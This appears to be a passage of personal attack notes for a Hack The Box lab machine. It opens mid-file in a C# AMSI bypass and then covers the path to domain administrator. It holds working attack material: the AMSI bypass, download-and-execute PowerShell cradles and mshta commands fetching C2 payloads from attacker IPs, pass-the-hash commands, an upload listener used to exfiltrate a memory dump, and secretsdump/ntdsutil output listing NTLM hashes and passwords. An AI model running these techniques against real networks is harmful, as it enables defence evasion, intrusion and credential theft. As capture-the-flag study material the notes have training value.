                    ctx.Dr1 = (ulong)address.ToInt64();
                    break;
                case 2:
                    ctx.Dr2 = (ulong)address.ToInt64();
                    break;
                case 3:
                    ctx.Dr3 = (ulong)address.ToInt64();
                    break;
            }
 
            ctx.Dr7 = SetBits(ctx.Dr7, 16, 16, 0);
            ctx.Dr7 = SetBits(ctx.Dr7, (index * 2), 1, 1);
            ctx.Dr6 = 0;
 
            Marshal.StructureToPtr(ctx, pCtx, true);
        }
 
        public static ulong SetBits(ulong dw, int lowBit, int bits, ulong newValue)
        {
            ulong mask = (1UL << bits) - 1UL;
            dw = (dw & ~(mask << lowBit)) | (newValue << lowBit);
            return dw;
        }
    }
 
    public class WinAPI
    {
        public const UInt32 DBG_CONTINUE = 0x00010002;
        public const UInt32 DBG_EXCEPTION_NOT_HANDLED = 0x80010001;
        public const Int32 EXCEPTION_CONTINUE_EXECUTION = -1;
        public const Int32 EXCEPTION_CONTINUE_SEARCH = 0;
        public const Int32 CREATE_PROCESS_DEBUG_EVENT = 3;
        public const Int32 CREATE_THREAD_DEBUG_EVENT = 2;
        public const Int32 EXCEPTION_DEBUG_EVENT = 1;
        public const Int32 EXIT_PROCESS_DEBUG_EVENT = 5;
        public const Int32 EXIT_THREAD_DEBUG_EVENT = 4;
        public const Int32 LOAD_DLL_DEBUG_EVENT = 6;
        public const Int32 OUTPUT_DEBUG_STRING_EVENT = 8;
        public const Int32 RIP_EVENT = 9;
        public const Int32 UNLOAD_DLL_DEBUG_EVENT = 7;
 
        public const UInt32 EXCEPTION_ACCESS_VIOLATION = 0xC0000005;
        public const UInt32 EXCEPTION_BREAKPOINT = 0x80000003;
        public const UInt32 EXCEPTION_DATATYPE_MISALIGNMENT = 0x80000002;
        public const UInt32 EXCEPTION_SINGLE_STEP = 0x80000004;
        public const UInt32 EXCEPTION_ARRAY_BOUNDS_EXCEEDED = 0xC000008C;
        public const UInt32 EXCEPTION_INT_DIVIDE_BY_ZERO = 0xC0000094;
        public const UInt32 DBG_CONTROL_C = 0x40010006;
        public const UInt32 DEBUG_PROCESS = 0x00000001;
        public const UInt32 CREATE_SUSPENDED = 0x00000004;
        public const UInt32 CREATE_NEW_CONSOLE = 0x00000010;
 
        public const Int32 AMSI_RESULT_CLEAN = 0;
 
        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern bool SetThreadContext(IntPtr hThread, IntPtr lpContext);
 
        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern bool GetThreadContext(IntPtr hThread, IntPtr lpContext);
 
        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
 
        [DllImport("kernel32", SetLastError = true, CharSet = CharSet.Ansi)]
        public static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)] string lpFileName);
 
        [DllImport("Kernel32.dll")]
        public static extern IntPtr AddVectoredExceptionHandler(uint First, IntPtr Handler);
 
        [Flags]
        public enum CONTEXT64_FLAGS : uint
        {
            CONTEXT64_AMD64 = 0x100000,
            CONTEXT64_CONTROL = CONTEXT64_AMD64 | 0x01,
            CONTEXT64_INTEGER = CONTEXT64_AMD64 | 0x02,
            CONTEXT64_SEGMENTS = CONTEXT64_AMD64 | 0x04,
            CONTEXT64_FLOATING_POINT = CONTEXT64_AMD64 | 0x08,
            CONTEXT64_DEBUG_REGISTERS = CONTEXT64_AMD64 | 0x10,
            CONTEXT64_FULL = CONTEXT64_CONTROL | CONTEXT64_INTEGER | CONTEXT64_FLOATING_POINT,
            CONTEXT64_ALL = CONTEXT64_CONTROL | CONTEXT64_INTEGER | CONTEXT64_SEGMENTS | CONTEXT64_FLOATING_POINT | CONTEXT64_DEBUG_REGISTERS
        }
 
        [StructLayout(LayoutKind.Sequential)]
        public struct M128A
        {
            public ulong High;
            public long Low;
 
            public override string ToString()
            {
                return string.Format("High:{0}, Low:{1}", this.High, this.Low);
            }
        }
 
        [StructLayout(LayoutKind.Sequential, Pack = 16)]
        public struct XSAVE_FORMAT64
        {
            public ushort ControlWord;
            public ushort StatusWord;
            public byte TagWord;
            public byte Reserved1;
            public ushort ErrorOpcode;
            public uint ErrorOffset;
            public ushort ErrorSelector;
            public ushort Reserved2;
            public uint DataOffset;
            public ushort DataSelector;
            public ushort Reserved3;
            public uint MxCsr;
            public uint MxCsr_Mask;
 
            [MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
            public M128A[] FloatRegisters;
 
            [MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
            public M128A[] XmmRegisters;
 
            [MarshalAs(UnmanagedType.ByValArray, SizeConst = 96)]
            public byte[] Reserved4;
        }
 
        [StructLayout(LayoutKind.Sequential, Pack = 16)]
        public struct CONTEXT64
        {
            public ulong P1Home;
            public ulong P2Home;
            public ulong P3Home;
            public ulong P4Home;
            public ulong P5Home;
            public ulong P6Home;
 
            public CONTEXT64_FLAGS ContextFlags;
            public uint MxCsr;
 
            public ushort SegCs;
            public ushort SegDs;
            public ushort SegEs;
            public ushort SegFs;
            public ushort SegGs;
            public ushort SegSs;
            public uint EFlags;
 
            public ulong Dr0;
            public ulong Dr1;
            public ulong Dr2;
            public ulong Dr3;
            public ulong Dr6;
            public ulong Dr7;
 
            public ulong Rax;
            public ulong Rcx;
            public ulong Rdx;
            public ulong Rbx;
            public ulong Rsp;
            public ulong Rbp;
            public ulong Rsi;
            public ulong Rdi;
            public ulong R8;
            public ulong R9;
            public ulong R10;
            public ulong R11;
            public ulong R12;
            public ulong R13;
            public ulong R14;
            public ulong R15;
            public ulong Rip;
 
            public XSAVE_FORMAT64 DUMMYUNIONNAME;
 
            [MarshalAs(UnmanagedType.ByValArray, SizeConst = 26)]
            public M128A[] VectorRegister;
            public ulong VectorControl;
 
            public ulong DebugControl;
            public ulong LastBranchToRip;
            public ulong LastBranchFromRip;
            public ulong LastExceptionToRip;
            public ulong LastExceptionFromRip;
        }
 
        [StructLayout(LayoutKind.Sequential)]
        public struct EXCEPTION_RECORD
        {
            public uint ExceptionCode;
            public uint ExceptionFlags;
            public IntPtr ExceptionRecord;
            public IntPtr ExceptionAddress;
            public uint NumberParameters;
            [MarshalAs(UnmanagedType.ByValArray, SizeConst = 15, ArraySubType = UnmanagedType.U4)] public uint[] ExceptionInformation;
        }
 
        [StructLayout(LayoutKind.Sequential)]
        public struct EXCEPTION_POINTERS
        {
            public IntPtr pExceptionRecord;
            public IntPtr pContextRecord;
        }
    }
}
"@
 
Add-Type -TypeDefinition $HWBP
[HWBP.Amsi]::Bypass()
(New-Object System.Net.WebClient).DownloadString('http://10.10.14.221/sliverphollow64.txt') | IEX

Getting Shells

cme smb 10.10.14.219-u 'Administrator' -H f99529e42ee77dc4704c568ba9320a34 --local-auth -x "C:\Windows\System32\mshta.exe http://10.10.14.221/sliver64.hta"
(New-Object System.Net.WebClient).DownloadString('http://10.10.14.219/amsi64.txt') | IEX
powershell%20%22IEX%20(New-Object%20System.Net.WebClient).DownloadString(%27http://10.10.14.219:80/amsi64.txt%27)%22
powershell "IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.14.219:80/amsi64.txt')"

Enumeration

PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain?       syn-ack ttl 127
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-07-13 01:45:39Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
47001/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49671/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49676/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49678/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49681/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
55297/tcp open  ms-sql-s      syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM

Host Recon

C:\Users\sql_svc\Downloads\SQLEXPR-2019_x64_ENU 
SQLSVCACCOUNT="FREELANCER\sql_svc"
SQLSVCPASSWORD="IL0v3ErenY3ager"
SQLSYSADMINACCOUNTS="FREELANCER\Administrator"
SECURITYMODE="SQL"
SAPWD="t3mp0r@ryS@PWD"

lkazanof lorra199 mikasaAckerman sql_svc sqlbackupoperator

 [+] freelancer.htb\mikasaAckerman:IL0v3ErenY3ager

cme smb 10.10.11.5 -u mikasaAckerman -p 'IL0v3ErenY3ager'
make-token -d freelancer.htb -u mikasaAckerman -p IL0v3ErenY3ager -T LOGON_NETWORK

207c5f198107487b55f5997fd3b490e2
$SecPassword = ConvertTo-SecureString 'IL0v3ErenY3ager' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('FREELANCER\mikasaAckerman', $SecPassword)
Start-Process -FilePath "C:\Windows\System32\cmd.exe" -ArgumentList "/c whoami" -Credential $Cred
Start-Process -FilePath "C:\Windows\System32\cmd.exe" -ArgumentList "/c powershell.exe 'IEX (New-Object System.Net.WebClient).DownloadString(http://10.10.14.32:80/amsi64.txt)'" -Credential $Cred
# Convert the password to a secure string
$SecPassword = ConvertTo-SecureString 'IL0v3ErenY3ager' -AsPlainText -Force
 
# Create the PSCredential object
$Cred = New-Object System.Management.Automation.PSCredential('FREELANCER\mikasaAckerman', $SecPassword)
 
# Run the 'whoami' command to verify credentials
Start-Process -FilePath "C:\Windows\System32\cmd.exe" -ArgumentList "/c whoami" -Credential $Cred
 
# Define the PowerShell command to be executed
$psCommand1 = "powershell.exe -ExecutionPolicy Bypass -Command `"IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.14.32:80/amsi64.txt')`""
 
# Run the PowerShell command using the specified credentials
Start-Process -FilePath "C:\Windows\System32\cmd.exe" -ArgumentList "/c $psCommand" -Credential $Cred
 
# Convert the password to a secure string
$SecPassword = ConvertTo-SecureString 'IL0v3ErenY3ager' -AsPlainText -Force
 
# Create the PSCredential object
$Cred = New-Object System.Management.Automation.PSCredential('FREELANCER\mikasaAckerman', $SecPassword)
 
# Run the 'whoami' command to verify credentials
Start-Process -FilePath "C:\Windows\System32\cmd.exe" -ArgumentList "/c whoami" -Credential $Cred
 
# Define the command to copy the file
$copyCommand = "copy C:\Users\mikasaAckerman\Desktop\MEMORY.7z C:\Windows\tasks\MEMORY.7z"
 
# Define the command to set permissions
$setPermsCommand = "icacls C:\Windows\tasks\MEMORY.7z /grant Everyone:F"
 
# Combine both commands into a single command
$psCommand = "powershell.exe -Command `"& { $copyCommand; $setPermsCommand }`""
 
$psCommand1 = "powershell.exe -ExecutionPolicy Bypass -Command `"IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.14.32:80/amsi64.txt')`""
 
# Run the combined command using the specified credentials
Start-Process -FilePath "C:\Windows\System32\cmd.exe" -ArgumentList "/c $psCommand" -Credential $Cred
 
Start-Process -FilePath "C:\Windows\System32\cmd.exe" -ArgumentList "/c $psCommand1" -Credential $Cred
 

Custom Http server

import http.server
import os
 
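class CustomHTTPRequestHandler(http.server.SimpleHTTPRequestHandler):
    """SimpleHTTPRequestHandler with a minimal PUT handler that stores uploads.

    GET/HEAD behave as in the base class. PUT writes the request body to the
    file that ``translate_path`` maps the URL to, inside the served directory.

    The handler performs no authentication: any client that can reach the
    port can create or overwrite files under the served directory, so run it
    from a dedicated, otherwise empty directory and stop it when the transfer
    is done.
    """

    # Largest request body do_PUT accepts, in bytes. Raise it deliberately if
    # bigger transfers are expected.
    MAX_UPLOAD_BYTES = 4 * 1024 ** 3
    # The body is copied to disk in pieces of this size instead of being read
    # into memory in one call.
    CHUNK_BYTES = 64 * 1024

    def do_PUT(self):
        """Store the request body at the translated path and answer 201.

        Responds 411 when Content-Length is missing or not an integer, 400
        when it is negative or the body ends early, 413 when it exceeds
        MAX_UPLOAD_BYTES, 403 when the target resolves outside the served
        directory or is a directory, and 500 when the file cannot be written.
        """
        # A missing header gives None and a malformed one a non-numeric
        # string; both are rejected rather than crashing the handler.
        try:
            length = int(self.headers.get('Content-Length'))
        except (TypeError, ValueError):
            self.send_error(411, "Length Required")
            return
        # A negative length would turn rfile.read() into "read until EOF".
        if length < 0:
            self.send_error(400, "Invalid Content-Length")
            return
        if length > self.MAX_UPLOAD_BYTES:
            self.send_error(413, "Upload too large")
            return

        # translate_path already drops '..' components; resolving symlinks and
        # re-checking containment guards against links that point elsewhere.
        base = os.path.realpath(getattr(self, 'directory', None) or os.getcwd())
        target = os.path.realpath(self.translate_path(self.path))
        try:
            inside = os.path.commonpath([base, target]) == base
        except ValueError:
            # Raised e.g. for paths on different drives.
            inside = False
        if not inside or os.path.isdir(target):
            self.send_error(403, "Forbidden upload target")
            return

        remaining = length
        try:
            with open(target, 'wb') as f:
                while remaining > 0:
                    chunk = self.rfile.read(min(remaining, self.CHUNK_BYTES))
                    if not chunk:
                        # Client closed the connection before sending it all.
                        break
                    f.write(chunk)
                    remaining -= len(chunk)
        except OSError:
            self.send_error(500, "Could not store upload")
            return
        if remaining:
            self.send_error(400, "Incomplete request body")
            return

        self.send_response(201, "Created")
        self.end_headers()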
 
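if __name__ == '__main__':
    # NOTE(review): '' listens on every interface and the PUT handler has no
    # authentication; on a shared network, bind to the single address that
    # needs to receive the upload instead.
    server_address = ('', 8080)
    httpd = http.server.HTTPServer(server_address, CustomHTTPRequestHandler)
    print("Serving HTTP on port 8080...")
    try:
        httpd.serve_forever()
    except KeyboardInterrupt:
        # Ctrl+C is the expected way to stop the server; exit without a traceback.
        pass
    finally:
        # Release the listening socket so the port is not left bound.
        httpd.server_close()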
 
# Send C:\Windows\tasks\MEMORY.7z with an HTTP PUT to the listener on 10.10.14.32:8080.
# NOTE(review): the transfer is plain HTTP with no authentication, so the
# archive (and whatever credential material it holds) crosses the network
# unencrypted; an outbound PUT of a large archive to a non-standard port is
# also visible in proxy and network-flow logs.
Invoke-WebRequest -Uri http://10.10.14.32:8080/Memory.7z -Method Put -InFile "C:\Windows\tasks\MEMORY.7z"
 
# Update package lists and install dependencies (Python 3, pip, venv support, git)
sudo apt update
sudo apt install -y python3 python3-pip python3-venv git

# Clone the Volatility 3 repository
# NOTE(review): this takes whatever the default branch holds at clone time.
# For repeatable analysis results, check out a release tag after cloning,
# e.g. `git checkout <RELEASE_TAG>` (placeholder), and record it in the notes.
git clone https://github.com/volatilityfoundation/volatility3.git

# Navigate to the Volatility 3 directory
cd volatility3

# Create a virtual environment
# Keeps the tool's Python dependencies separate from the system packages.
python3 -m venv venv

# Activate the virtual environment
source venv/bin/activate

# Install required Python packages
# Installs into the active venv; versions are whatever requirements.txt
# allows at install time unless they are pinned there.
pip install -r requirements.txt

# Verify the installation
python vol.py -h

python3 vol.py -f memory.dmp windows.cachedump.Cachedump
Username        Hash
Administrator   67a0c0f193abd932b55fb8916692c361
lorra199        7ce808b78e75a5747135cf53dc6ac3b1
liza.kazanof    ecd6e532224ccad2abcf2369ccb8b679
Username            Hash
Administrator       725180474a181356e53f4fe3dffac527
Guest               31d6cfe0d16ae931b73c59d7e0c089c0
DefaultAccount      31d6cfe0d16ae931b73c59d7e0c089c0
WDAGUtilityAccount  04fc56dd3ee3165e966ed04ea791d7a7
./memprocfs -device /home/jay/htb/memory.dmp -mount /home/jay/htb/memprocfs
 secretsdump.py -sam /home/jay/htb/memprocfs/registry/hive_files/0xffffd3067d935000-SAM-MACHINE_SAM.reghive -system /home/jay/htb/memprocfs/registry/hive_files/0xffffd30679c46000-SYSTEM-MACHINE_SYSTEM.reghive -security /home/jay/htb/memprocfs/registry/hive_files/0xffffd3067d7f0000-SECURITY-MACHINE_SECURITY.reghive LOCAL
Administrator:500:aad3b435b51404eeaad3b435b51404ee:725180474a181356e53f4fe3dffac527:::
PWN3D#l0rr@Armessa199
nxc smb 10.10.11.5 -u users3.txt -p passwords.txt --continue-on-success
 [+] freelancer.htb\lorra199:PWN3D#l0rr@Armessa199

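GenericWrite: lorra199 presumably holds GenericWrite on the DC$ computer object (the ACL check itself is not shown in these notes); the commands below rely on it to configure resource-based constrained delegation from a newly added machine account. Hardening: set ms-DS-MachineAccountQuota to 0 so ordinary users cannot add computer accounts, remove the unneeded write ACE from the domain controller object, and alert on changes to msDS-AllowedToActOnBehalfOfOtherIdentity.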

nxc smb 10.10.11.5 -u lorra199 -p 'PWN3D#l0rr@Armessa199' -M add-computer -o Name="BADPC" PASSWORD="Password1"
rbcd.py -delegate-from BADPC$ -delegate-to DC$ -action 'write' 'freelancer.htb/lorra199:PWN3D#l0rr@Armessa199'
nxc smb 10.10.11.5 -u Administrator --use-kcache -X "(New-Object System.Net.WebClient).DownloadString('http://10.10.14.32/amsi64.txt') | IEX" --exec-method smbexec
 nxc smb 10.10.11.5 -u Administrator --use-kcache -M ntdsutil
 Administrator:500:aad3b435b51404eeaad3b435b51404ee:0039318f1e8274633445bce32ad1a290:::
evil-winrm -i 10.10.11.5 -u Administrator -H 0039318f1e8274633445bce32ad1a290
20da004c7d65cc2239561420812daa35 ## root.txt
 Administrator:500:aad3b435b51404eeaad3b435b51404ee:0039318f1e8274633445bce32ad1a290:::
NTDSUTIL    10.10.11.5      445    DC               Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
NTDSUTIL    10.10.11.5      445    DC               DC$:1000:aad3b435b51404eeaad3b435b51404ee:89851d57d9c8cc8addb66c59b83a4379:::
NTDSUTIL    10.10.11.5      445    DC               krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d238e0bfa17d575038efc070187a91c2:::
NTDSUTIL    10.10.11.5      445    DC               freelancer.htb\mikasaAckerman:1105:aad3b435b51404eeaad3b435b51404ee:e8d62c7d57e5d74267ab6feb2f662674:::
NTDSUTIL    10.10.11.5      445    DC               sshd:1108:aad3b435b51404eeaad3b435b51404ee:c1e83616271e8e17d69391bdcd335ab4:::
NTDSUTIL    10.10.11.5      445    DC               SQLBackupOperator:1112:aad3b435b51404eeaad3b435b51404ee:c4b746db703d1af5575b5c3d69f57bab:::
NTDSUTIL    10.10.11.5      445    DC               sql_svc:1114:aad3b435b51404eeaad3b435b51404ee:af7b9d0557964265115d018b5cff6f8a:::
NTDSUTIL    10.10.11.5      445    DC               DATACENTER-2019$:1115:aad3b435b51404eeaad3b435b51404ee:7a8b0efef4571ec55cc0b9f8cb73fdcf:::
NTDSUTIL    10.10.11.5      445    DC               lorra199:1116:aad3b435b51404eeaad3b435b51404ee:67d4ae78a155aab3d4aa602da518c051:::
NTDSUTIL    10.10.11.5      445    DC               freelancer.htb\maya.artmes:1124:aad3b435b51404eeaad3b435b51404ee:22db50a324b9a34ea898a290c1284e25:::
NTDSUTIL    10.10.11.5      445    DC               freelancer.htb\michael.williams:1126:aad3b435b51404eeaad3b435b51404ee:af7b9d0557964265115d018b5cff6f8a:::
NTDSUTIL    10.10.11.5      445    DC               freelancer.htb\sdavis:1127:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
NTDSUTIL    10.10.11.5      445    DC               freelancer.htb\d.jones:1128:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
NTDSUTIL    10.10.11.5      445    DC               freelancer.htb\jen.brown:1129:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
NTDSUTIL    10.10.11.5      445    DC               freelancer.htb\taylor:1130:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
NTDSUTIL    10.10.11.5      445    DC               freelancer.htb\jmartinez:1131:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
NTDSUTIL    10.10.11.5      445    DC               freelancer.htb\olivia.garcia:1133:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
NTDSUTIL    10.10.11.5      445    DC               freelancer.htb\dthomas:1134:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
NTDSUTIL    10.10.11.5      445    DC               freelancer.htb\sophia.h:1135:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
NTDSUTIL    10.10.11.5      445    DC               freelancer.htb\Ethan.l:1138:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
NTDSUTIL    10.10.11.5      445    DC               freelancer.htb\wwalker:1141:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
NTDSUTIL    10.10.11.5      445    DC               freelancer.htb\jgreen:1142:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
NTDSUTIL    10.10.11.5      445    DC               freelancer.htb\evelyn.adams:1143:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
NTDSUTIL    10.10.11.5      445    DC               freelancer.htb\hking:1144:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
NTDSUTIL    10.10.11.5      445    DC               freelancer.htb\alex.hill:1145:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
NTDSUTIL    10.10.11.5      445    DC               freelancer.htb\samuel.turner:1146:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
NTDSUTIL    10.10.11.5      445    DC               freelancer.htb\ereed:1149:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
NTDSUTIL    10.10.11.5      445    DC               freelancer.htb\leon.sk:1151:aad3b435b51404eeaad3b435b51404ee:af7b9d0557964265115d018b5cff6f8a:::
NTDSUTIL    10.10.11.5      445    DC               DATAC2-2022$:1155:aad3b435b51404eeaad3b435b51404ee:007a710c0581c63104dad1e477c794e8:::
NTDSUTIL    10.10.11.5      445    DC               WS1-WIIN10$:1156:aad3b435b51404eeaad3b435b51404ee:57e57c6a3f0f8fff74e8ab524871616b:::
NTDSUTIL    10.10.11.5      445    DC               WS2-WIN11$:1157:aad3b435b51404eeaad3b435b51404ee:bf5267ee6236c86a3596f72f2ddef2da:::
NTDSUTIL    10.10.11.5      445    DC               WS3-WIN11$:1158:aad3b435b51404eeaad3b435b51404ee:732c190482eea7b5e6777d898e352225:::
NTDSUTIL    10.10.11.5      445    DC               DC2$:1159:aad3b435b51404eeaad3b435b51404ee:e1018953ffa39b3818212aba3f736c0f:::
NTDSUTIL    10.10.11.5      445    DC               freelancer.htb\carol.poland:1160:aad3b435b51404eeaad3b435b51404ee:af7b9d0557964265115d018b5cff6f8a:::
NTDSUTIL    10.10.11.5      445    DC               freelancer.htb\lkazanof:1162:aad3b435b51404eeaad3b435b51404ee:a26c33c2878b23df8b2da3d10e430a0f:::
NTDSUTIL    10.10.11.5      445    DC               SETUPMACHINE$:8601:aad3b435b51404eeaad3b435b51404ee:f5912663ecf2c8cbda2a4218127d11fe:::
NTDSUTIL    10.10.11.5      445    DC               BADPC$:11601:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::